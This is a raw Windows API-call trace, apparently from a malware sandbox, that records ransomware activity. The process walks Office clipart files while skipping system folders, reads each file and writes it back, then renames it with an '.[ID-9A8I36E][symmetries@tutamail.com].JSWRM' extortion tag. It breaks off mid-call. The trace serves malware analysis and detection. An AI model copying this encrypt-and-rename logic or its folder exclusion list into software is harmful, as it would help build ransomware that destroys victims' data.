WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00494_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00494_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0091.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0091.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00494_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.460] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2360) returned 1 [0091.460] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x930) returned 0x20c6c0 [0091.460] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x930, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x930, lpOverlapped=0x0) returned 1 [0091.462] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.462] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x930, lpOverlapped=0x0) returned 1 [0091.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0091.462] CloseHandle (hObject=0x314) returned 1 [0091.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0091.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0091.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0091.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0091.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0091.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0091.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0091.462] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00494_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00494_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00494_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0091.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0091.463] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb60, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00512_.WMF", cAlternateFileName="")) returned 1 [0091.463] lstrcmpiW (lpString1="NA00512_.WMF", lpString2=".") returned 1 [0091.463] lstrcmpiW (lpString1="NA00512_.WMF", lpString2="..") returned 1 [0091.463] lstrcmpiW (lpString1="NA00512_.WMF", lpString2="...") returned 1 [0091.463] lstrcmpiW (lpString1="NA00512_.WMF", lpString2="windows") returned -1 [0091.463] lstrcmpiW (lpString1="NA00512_.WMF", lpString2="recovery") returned -1 [0091.463] lstrcmpiW (lpString1="NA00512_.WMF", lpString2="perflogs") returned -1 [0091.463] lstrcmpiW (lpString1="NA00512_.WMF", lpString2="documents and settings") returned 1 [0091.463] lstrcmpiW (lpString1="NA00512_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.463] lstrcmpiW (lpString1="NA00512_.WMF", lpString2="system volume information") returned -1 [0091.463] lstrcmpiW (lpString1="NA00512_.WMF", lpString2="msocache") returned 1 [0091.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00512_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00512_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00512_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0091.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00512_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00512_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00512_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0091.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0091.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0091.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00512_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.464] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2912) returned 1 [0091.464] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb60) returned 0x23fc98 [0091.464] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb60, lpOverlapped=0x0) returned 1 [0091.472] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.472] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb60, lpOverlapped=0x0) returned 1 [0091.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0091.472] CloseHandle (hObject=0x314) returned 1 [0091.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0091.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0091.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0091.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0091.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0091.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0091.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.473] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00512_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00512_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00512_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0091.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0091.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0091.474] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6efa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00523_.WMF", cAlternateFileName="")) returned 1 [0091.474] lstrcmpiW (lpString1="NA00523_.WMF", lpString2=".") returned 1 [0091.474] lstrcmpiW (lpString1="NA00523_.WMF", lpString2="..") returned 1 [0091.474] lstrcmpiW (lpString1="NA00523_.WMF", lpString2="...") returned 1 [0091.474] lstrcmpiW (lpString1="NA00523_.WMF", lpString2="windows") returned -1 [0091.474] lstrcmpiW (lpString1="NA00523_.WMF", lpString2="recovery") returned -1 [0091.474] lstrcmpiW (lpString1="NA00523_.WMF", lpString2="perflogs") returned -1 [0091.474] lstrcmpiW (lpString1="NA00523_.WMF", lpString2="documents and settings") returned 1 [0091.474] lstrcmpiW (lpString1="NA00523_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.474] lstrcmpiW (lpString1="NA00523_.WMF", lpString2="system volume information") returned -1 [0091.474] lstrcmpiW (lpString1="NA00523_.WMF", lpString2="msocache") returned 1 [0091.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0091.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00523_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00523_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00523_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0091.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0091.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00523_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00523_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00523_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0091.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0091.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0091.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0091.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00523_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.475] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28410) returned 1 [0091.475] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6ef0) returned 0x24d210 [0091.476] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6ef0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6ef0, lpOverlapped=0x0) returned 1 [0091.479] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.479] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6ef0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6ef0, lpOverlapped=0x0) returned 1 [0091.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.480] CloseHandle (hObject=0x314) returned 1 [0091.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0091.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0091.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0091.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0091.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0091.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0091.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.481] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00523_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00523_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00523_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0091.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0091.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0091.481] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5880, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00525_.WMF", cAlternateFileName="")) returned 1 [0091.481] lstrcmpiW (lpString1="NA00525_.WMF", lpString2=".") returned 1 [0091.481] lstrcmpiW (lpString1="NA00525_.WMF", lpString2="..") returned 1 [0091.481] lstrcmpiW (lpString1="NA00525_.WMF", lpString2="...") returned 1 [0091.481] lstrcmpiW (lpString1="NA00525_.WMF", lpString2="windows") returned -1 [0091.481] lstrcmpiW (lpString1="NA00525_.WMF", lpString2="recovery") returned -1 [0091.482] lstrcmpiW (lpString1="NA00525_.WMF", lpString2="perflogs") returned -1 [0091.482] lstrcmpiW (lpString1="NA00525_.WMF", lpString2="documents and settings") returned 1 [0091.482] lstrcmpiW (lpString1="NA00525_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.482] lstrcmpiW (lpString1="NA00525_.WMF", lpString2="system volume information") returned -1 [0091.482] lstrcmpiW (lpString1="NA00525_.WMF", lpString2="msocache") returned 1 [0091.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0091.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00525_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00525_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00525_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0091.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0091.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00525_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00525_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00525_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0091.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0091.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.482] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22656) returned 1 [0091.482] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5880) returned 0x24d210 [0091.483] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5880, 